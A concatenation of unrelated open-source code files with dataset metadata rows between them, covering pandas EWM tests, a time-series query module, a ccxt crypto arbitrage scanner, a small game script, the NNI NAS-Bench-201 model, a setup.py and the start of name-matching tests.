@pytest.mark.parametrize("name", ["cov", "corr"])
def test_ewm_corr_cov_min_periods(name, min_periods):
# GH 7898
A = Series(np.random.randn(50), index=np.arange(50))
B = A[2:] + np.random.randn(48)
A[:10] = np.NaN
B[-10:] = np.NaN
result = getattr(A.ewm(com=20, min_periods=min_periods), name)(B)
# binary functions (ewmcov, ewmcorr) with bias=False require at
# least two values
assert np.isnan(result.values[:11]).all()
assert not np.isnan(result.values[11:]).any()
# check series of length 0
empty = Series([], dtype=np.float64)
result = getattr(empty.ewm(com=50, min_periods=min_periods), name)(empty)
tm.assert_series_equal(result, empty)
# check series of length 1
result = getattr(Series([1.0]).ewm(com=50, min_periods=min_periods), name)(
Series([1.0])
)
tm.assert_series_equal(result, Series([np.NaN]))
@pytest.mark.parametrize("name", ["cov", "corr"])
def test_different_input_array_raise_exception(name):
A = Series(np.random.randn(50), index=np.arange(50))
A[:10] = np.NaN
msg = "other must be a DataFrame or Series"
# exception raised is Exception
with pytest.raises(ValueError, match=msg):
getattr(A.ewm(com=20, min_periods=5), name)(np.random.randn(50))
def create_mock_weights(obj, com, adjust, ignore_na):
if isinstance(obj, DataFrame):
if not len(obj.columns):
return DataFrame(index=obj.index, columns=obj.columns)
w = concat(
[
create_mock_series_weights(
obj.iloc[:, i], com=com, adjust=adjust, ignore_na=ignore_na
)
for i, _ in enumerate(obj.columns)
],
axis=1,
)
w.index = obj.index
w.columns = obj.columns
return w
else:
return create_mock_series_weights(obj, com, adjust, ignore_na)
def create_mock_series_weights(s, com, adjust, ignore_na):
w = Series(np.nan, index=s.index)
alpha = 1.0 / (1.0 + com)
if adjust:
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
w.iat[i] = pow(1.0 / (1.0 - alpha), count)
count += 1
elif not ignore_na:
count += 1
else:
sum_wts = 0.0
prev_i = -1
count = 0
for i in range(len(s)):
if s.iat[i] == s.iat[i]:
if prev_i == -1:
w.iat[i] = 1.0
else:
w.iat[i] = alpha * sum_wts / pow(1.0 - alpha, count - prev_i)
sum_wts += w.iat[i]
prev_i = count
count += 1
elif not ignore_na:
count += 1
return w
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_mean(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
result = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
expected = (
x.multiply(weights).cumsum().divide(weights.cumsum()).fillna(method="ffill")
)
expected[
x.expanding().count() < (max(min_periods, 1) if min_periods else 1)
] = np.nan
tm.assert_equal(result, expected.astype("float64"))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_consistent(consistency_data, adjust, ignore_na, min_periods):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding().count()
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
# check that correlation of a series with itself is either 1 or NaN
corr_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x)
exp = x.max() if isinstance(x, Series) else x.max().max()
# check mean of constant series
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = exp
tm.assert_equal(mean_x, expected)
# check correlation of constant series with itself is NaN
expected[:] = np.nan
tm.assert_equal(corr_x_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
def test_ewm_consistency_var_debiasing_factors(
consistency_data, adjust, ignore_na, min_periods
):
x, is_constant, no_nans = consistency_data
com = 3.0
# check variance debiasing factors
var_unbiased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=False)
var_biased_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=True)
weights = create_mock_weights(x, com=com, adjust=adjust, ignore_na=ignore_na)
cum_sum = weights.cumsum().fillna(method="ffill")
cum_sum_sq = (weights * weights).cumsum().fillna(method="ffill")
numerator = cum_sum * cum_sum
denominator = numerator - cum_sum_sq
denominator[denominator <= 0.0] = np.nan
var_debiasing_factors_x = numerator / denominator
tm.assert_equal(var_unbiased_x, var_biased_x * var_debiasing_factors_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
if bias:
# check that biased var(x) == mean(x^2) - mean(x)^2
mean_x2 = (
(x * x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.mean()
)
tm.assert_equal(var_x, mean_x2 - (mean_x * mean_x))
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_moments_consistency_var_constant(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if is_constant:
count_x = x.expanding(min_periods=min_periods).count()
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
# check that variance of constant series is identically 0
assert not (var_x > 0).any().any()
expected = x * np.nan
expected[count_x >= max(min_periods, 1)] = 0.0
if not bias:
expected[count_x < 2] = np.nan
tm.assert_equal(var_x, expected)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_std(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
assert not (var_x < 0).any().any()
assert not (std_x < 0).any().any()
# check that var(x) == std(x)^2
tm.assert_equal(var_x, std_x * std_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_cov(consistency_data, adjust, ignore_na, min_periods, bias):
x, is_constant, no_nans = consistency_data
com = 3.0
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
assert not (var_x < 0).any().any()
cov_x_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
assert not (cov_x_x < 0).any().any()
# check that var(x) == cov(x, x)
tm.assert_equal(var_x, cov_x_x)
@pytest.mark.parametrize("min_periods", [0, 1, 2, 3, 4])
@pytest.mark.parametrize("bias", [True, False])
def test_ewm_consistency_series_cov_corr(
consistency_data, adjust, ignore_na, min_periods, bias
):
x, is_constant, no_nans = consistency_data
com = 3.0
if isinstance(x, Series):
var_x_plus_y = (
(x + x)
.ewm(com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na)
.var(bias=bias)
)
var_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
var_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).var(bias=bias)
cov_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).cov(x, bias=bias)
# check that cov(x, y) == (var(x+y) - var(x) -
# var(y)) / 2
tm.assert_equal(cov_x_y, 0.5 * (var_x_plus_y - var_x - var_y))
# check that corr(x, y) == cov(x, y) / (std(x) *
# std(y))
corr_x_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).corr(x, bias=bias)
std_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
std_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).std(bias=bias)
tm.assert_equal(corr_x_y, cov_x_y / (std_x * std_y))
if bias:
# check that biased cov(x, y) == mean(x*y) -
# mean(x)*mean(y)
mean_x = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_y = x.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
).mean()
mean_x_times_y = (
(x * x)
.ewm(
com=com, min_periods=min_periods, adjust=adjust, ignore_na=ignore_na
)
.mean()
)
tm.assert_equal(cov_x_y, mean_x_times_y - (mean_x * mean_y))
| 34.173653 | 88 | 0.615297 | 0 | 0 | 0 | 0 | 9,779 | 0.856755 | 0 | 0 | 992 | 0.086911 |
c79e030266cfddaf92e93230023130a13241d6c0 | 6,895 | py | Python | brainex/query.py | ebuntel/BrainExTemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| 1 | 2020-09-04T16:15:26.000Z | 2020-09-04T16:15:26.000Z | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| null | null | null | brainex/query.py | ebuntel/Brainextemp | 991038155a6e9289af90da3d800210841ef23ff1 | [
"MIT"
]
| null | null | null |
# TODO finish implementing query
import math
from pyspark import SparkContext
# from genex.cluster import sim_between_seq
from brainex.op.query_op import sim_between_seq
from brainex.parse import strip_function, remove_trailing_zeros
from .classes import Sequence
from brainex.database import genexengine
def query(q: Sequence, gc: genexengine, loi: list, sc: SparkContext,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, mode:str='genex'):
"""
:param q: query sequence
:param gc: Gcluster in which to query
:param loi: list of two integer values, specifying the query range, if set to None, is going to query all length
:param sc: spark context on which to run the query operation
:param k: integer, specifying to return top k matches
:param ex_sameID: boolean, whether to include sequences from the time series with the same id as the query sequence
:param overlap: float, how much overlapping between queries lookups
:param mode: query mode, supported modes are 'genex' and 'bf' (bf = brute force)
"""
if mode == 'genex':
gquery()
elif mode == 'bf':
bfquery()
else:
raise Exception('Unsupported query mode: ' + mode)
def get_query_from_dict():
pass
def get_query_sequence_from_file(file: str):
resList = []
with open(file, 'r') as f:
for i, line in enumerate(f):
if not i:
features = list(map(lambda x: strip_function(x),
line.strip()[:-1].split(',')))
if line != "" and line != "\n":
data = remove_trailing_zeros(line.split(",")[:-1])
series_data = data[len(features):]
resList.append(series_data)
if len(resList[0]) == 0:
return resList[1:]
else:
return resList
def gquery(query_list: list, gc_data: dict, loi: list, input_list: list,
k:int=1, ex_sameID: bool=False, overlap: float= 1.0, ):
"""
Because Gcluster object doesn't have map property, we have to use dict as input
:param file:
:param gc_data:
:param loi:
:param input_list:
:param k:
:param ex_sameID:
:param overlap:
:return:
"""
# get query from id, start, end point
# get query from csv file
#
# query_list = []
# query_set = get_query_from_csv_with_id(file)
# print(query_set)
# for cur_query in query_set:
# query_list.append(get_query_from_sequence(cur_query[0], int(cur_query[1]), int(cur_query[2]), input_list))
# print(query_list)
return custom_query(query_list, loi, gc_data, k, input_list)
def bfquery():
print()
#
# def custom_query_operation(q: Sequence, gc: Gcluster, loi: list, sc: SparkContext,
# k:int=1, ex_sameID: bool=False, overlap: float= 1.0):
#
# query_result = filter_rdd_back.repartition(16).map(
# lambda clusters: custom_query(q, loi, gc, k,
# global_time_series_dict.value, ))
# # changed here
# # plot_query_result(query_sequence, query_result, global_time_series_dict.value)
# return query_result
def get_query_from_sequence(id: tuple, start: int, end: int, input_list: list):
"""
:param id:
:param start:
:param end:
:param input_list:
:return: a list
"""
try:
input_dict = dict(input_list) # validate by converting input_list into a dict
except (TypeError, ValueError):
raise Exception('sequence: fetch_data: input_list is not key-value pair.')
return input_dict[id][start: end]
def custom_query(query_sequences: list, loi: list, Gcluster_data:dict, k : int, input_list:list):
# """
#
# :param query_sequences: list of list: the list of sequences to be queried
# :param cluster: dict[key = representative, value = list of timeSeriesObj] -> representative is timeSeriesObj
# the sequences in the cluster are all of the SAME length
# :param k: int
# :return list of time series objects: best k matches. Again note they are all of the SAME length
# """
"""
:param query_sequences:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
# get query from csv file which contains lists of list of query actual clusters
# get query from csv file which contains lists of tuple of id, start, endpoint
query_result = dict()
if not isinstance(query_sequences, list) or len(query_sequences) == 0:
raise ValueError("query sequence must be a list and not empty")
cur_query_number = 0
if isinstance(query_sequences[0], list):
print("length of query is [" + str(len(query_sequences)) + "]" + "[" + str(len(query_sequences[0])) + "]")
print("query is a list of list")
for cur_query in query_sequences:
if isinstance(cur_query, list):
query_result[cur_query_number] = get_most_k_sim(cur_query, loi, Gcluster_data, k, input_list)
cur_query_number += 1
return query_result
else:
return get_most_k_sim(query_sequences, loi, Gcluster_data, k, input_list)
def get_most_k_sim(query_sequence: list, loi: list, Gcluster_data : dict, k, input_list:list):
"""
:param query_sequence:
:param query_range:
:param Gcluster_data:
:param k:
:param input_list:
:return:
"""
min_rprs = None # the representative that is closest to the query distance
min_dist = math.inf
target_cluster = []
print("length of gcluster clusters is " + str(len(Gcluster_data[1])))
for cur_rprs_seq in Gcluster_data[1].keys():
# TODO do we want to get raw clusters here, or set the raw in timeSeriesObj before calling query (no parsing)
if (cur_rprs_seq.end - cur_rprs_seq.start + 1) in range(loi[0], loi[1] + 1):
# modify here, not use get clusters from objects, use values
cur_dist = sim_between_seq(query_sequence, cur_rprs_seq.fetch_data(input_list))
if cur_dist < min_dist:
min_rprs = cur_rprs_seq
min_dist = cur_dist
else:
break
if min_rprs:
print('min representative is ' + min_rprs.__str__())
print('min dist' + str(min_dist))
# print("Querying Cluster of length: " + str(len(get_data_for_timeSeriesObj(min_rprs, time_series_dict))))
target_cluster = Gcluster_data[1].get(min_rprs)
print('len of cluster is ' + str(len(target_cluster)))
# print("sorting")
#
target_cluster.sort(key=lambda cluster_sequence: sim_between_seq(query_sequence,
cluster_sequence.data))
k = int(k)
return target_cluster[0:k] # return the k most similar sequences
else:
return None
| 33.634146 | 119 | 0.639014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,347 | 0.485424 |
c79e23eb5e67f7342ba09df2a42c01c2772ded3a | 4,161 | py | Python | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| null | null | null | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| 1 | 2021-12-13T03:48:08.000Z | 2021-12-13T04:58:36.000Z | main.py | orgr/arbitrage_bot | 39365dce0dcae0f6bb4baf1d7c32392e28b6c623 | [
"MIT"
]
| null | null | null | import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
class Color(Enum):
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
RESET = '\033[0m'
def colorize(s, color: Color):
# return color.value + s + Color.RESET.value
return "{}{}{}".format(color.value, s, Color.RESET.value)
def green(s):
return colorize(s, Color.GREEN)
def yellow(s):
return colorize(s, Color.YELLOW)
def red(s):
return colorize(s, Color.RED)
class ArbitrageOpportunity(Enum):
NONE = 0
BUY = 1
SELL = 2
def __str__(self):
return self.name
def get_complementary_trade(t: ArbitrageOpportunity):
assert (t != ArbitrageOpportunity.NONE)
return ArbitrageOpportunity.BUY if t == ArbitrageOpportunity.SELL else ArbitrageOpportunity.SELL
class Price:
def __init__(self, exchange, symbol, bid, ask):
self.exchange = exchange
self.symbol = symbol
self.bid = bid
self.ask = ask
def is_opportunity(self, other):
if self.bid > other.ask:
return ArbitrageOpportunity.BUY # buy from other exchange
if self.ask < other.bid:
return ArbitrageOpportunity.SELL # buy from this exchange
return ArbitrageOpportunity.NONE
def compare_prices(p1: Price, p2: Price):
return p1.is_opportunity(p2)
async def get_price(symbol, exchange) -> Price:
orderbook = await exchange.fetch_order_book(symbol, 10)
bid = orderbook['bids'][0][0] if len(orderbook['bids']) > 0 else None
ask = orderbook['asks'][0][0] if len(orderbook['asks']) > 0 else None
# spread = (ask - bid) if (bid and ask) else None
# print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread})
if bid is None or ask is None:
return None
return Price(exchange, symbol, float(bid), float(ask))
async def main():
if len(sys.argv) < 3:
print("Usage: python {} <exchange id 1> <exchange id 2> ...".format(sys.argv[0]))
return
exchanges = []
try:
# initialize exchanges
tasks = []
for ex_id in sys.argv[1:]:
try:
ex = getattr(ccxt, ex_id)({'enableRateLimit': True}) # type: ccxt.Exchange
# ex.set_sandbox_mode(enabled=True)
except AttributeError:
print("{} is not supported".format(ex_id))
return
except ccxt.NotSupported:
print("{} paper trading is not supported".format(ex_id))
return
tasks.append(asyncio.create_task(ex.load_markets()))
exchanges.append(ex)
[await t for t in tasks]
all_symbols = [symbol for ex in exchanges for symbol in ex.symbols]
unique_arbitrable_symbols = set([symbol for symbol in all_symbols if all_symbols.count(symbol) > 1])
for symbol in unique_arbitrable_symbols:
tasks = []
for ex in exchanges:
tasks.append(asyncio.create_task(get_price(symbol, ex)))
[await t for t in tasks]
prices = [t.result() for t in tasks]
if len(prices) > 1:
arbitrage_pairs = itertools.combinations(prices, r=2)
for p in arbitrage_pairs:
opportunity = compare_prices(p[0], p[1])
if opportunity != ArbitrageOpportunity.NONE:
print(green("{}: {} from {}, {} from {}".format(symbol, opportunity, p[1].exchange.id,
get_complementary_trade(opportunity),
p[0].exchange.id)))
else:
print(yellow(symbol))
# close all connections on KeyboardInterrupts and errors
finally:
[await ex.close() for ex in exchanges]
if __name__ == '__main__':
asyncio.run(main())
| 30.152174 | 111 | 0.564768 | 713 | 0.171353 | 0 | 0 | 0 | 0 | 2,598 | 0.624369 | 609 | 0.146359 |
c79ee6a1b6ebeba170b33fbfe523726f9f206dbb | 1,497 | py | Python | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | examples/click-ninja/clickninja-final.py | predicatemike/predigame | 096e8379beb1d40ccb3f19ed2bb3ad82b405bb7f | [
"Apache-2.0"
]
| null | null | null | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
def destroy(s):
sound('swoosh')
if s.name == 'taco':
score(50)
else:
score(5)
# draw a splatting image at the center position of the image
image('redsplat', center=s.event_pos, size=2).fade(1.0)
s.fade(0.25)
def failure(s):
score(-20)
if s.name == 'bomb':
s.destroy()
image('explode', center=s.center, size=10).pulse(0.05)
if s.name == 'bomb' or score() < 0:
sound('scream')
text('You Survived %s seconds' % time(), MAROON)
callback(gameover, 0.01)
def spawn():
speed = randint(2, 10)
size = randint(1,4)
target = choice(['bananas', 'cherries',
'olives', 'ham', 'hotdog',
'fries','icee', 'pizza'])
if randint(1, 4) == 2:
target = 'bomb'
if randint(1, 10) == 5:
target = 'taco'
sound('launch')
arc = rand_arc()
s = image(target, arc[0], size=size)
if target == 'bomb':
s.speed(speed).spin(1).clicked(failure)
s.move_to(arc[1], arc[2], callback = s.destroy)
elif target == 'taco':
s.speed(5).spin().clicked(destroy)
s.move_to((-10, -2), (-5, HEIGHT/2), (WIDTH+1, HEIGHT/2), callback = s.destroy)
else:
s.speed(speed).clicked(destroy)
s.move_to(arc[1], arc[2], callback = lambda: failure(s))
callback(spawn, rand(0.1, 3))
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| 24.145161 | 86 | 0.549766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 253 | 0.169005 |
c79f981e96642b4e8be1f381e054bf741fdc029f | 7,166 | py | Python | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 2,305 | 2018-09-07T12:42:26.000Z | 2019-05-06T20:14:24.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 379 | 2018-09-10T10:19:50.000Z | 2019-05-06T18:04:46.000Z | nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 1530339d3e964a5ea95a0afde1775ec9167cdcc0 | [
"MIT"
]
| 314 | 2018-09-08T05:36:08.000Z | 2019-05-06T08:48:51.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
| 34.786408 | 110 | 0.579542 | 6,161 | 0.859754 | 0 | 0 | 1,935 | 0.270025 | 0 | 0 | 458 | 0.063913 |
c7a0f4dd6f424ce5b114a5129ff1abc4021aa810 | 1,195 | py | Python | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| 1 | 2021-02-17T07:38:01.000Z | 2021-02-17T07:38:01.000Z | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| null | null | null | setup.py | Pasha13666/dialog_py | c54a0e06dc0a5f86d9791b8cbd6fcfacb5b644ff | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='[email protected]',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| 31.447368 | 88 | 0.620921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 676 | 0.56569 |
c7a18f6b2dc263a28bbb7cb8d8990ce3618a2615 | 8,334 | py | Python | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 28 | 2018-02-14T23:14:59.000Z | 2021-07-08T07:24:54.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 1 | 2019-01-21T15:25:49.000Z | 2019-01-23T19:03:06.000Z | test/test_who.py | rliebz/whoswho | 0c411e418c240fcec6ea0a23d15bd003056c65d0 | [
"MIT"
]
| 2 | 2018-09-27T05:46:46.000Z | 2020-07-16T05:19:02.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = 'Robert Evan Liebowitz'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('Robert Liebowitz')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, 'attaché Robert Evan Liebowitz'))
assert_true(who.match(name, 'Rōbért Èvān Lîęböwitz'))
assert_false(who.match(name, 'Rōbért Èvān Lęîböwitz'))
def test_name_and_initials(self):
assert_true(who.match(self.name, 'R. Evan Liebowitz'))
assert_true(who.match(self.name, 'Robert E. Liebowitz'))
assert_true(who.match(self.name, 'R. E. Liebowitz'))
def test_different_number_initials(self):
assert_true(who.match(self.name, 'Robert Liebowitz'))
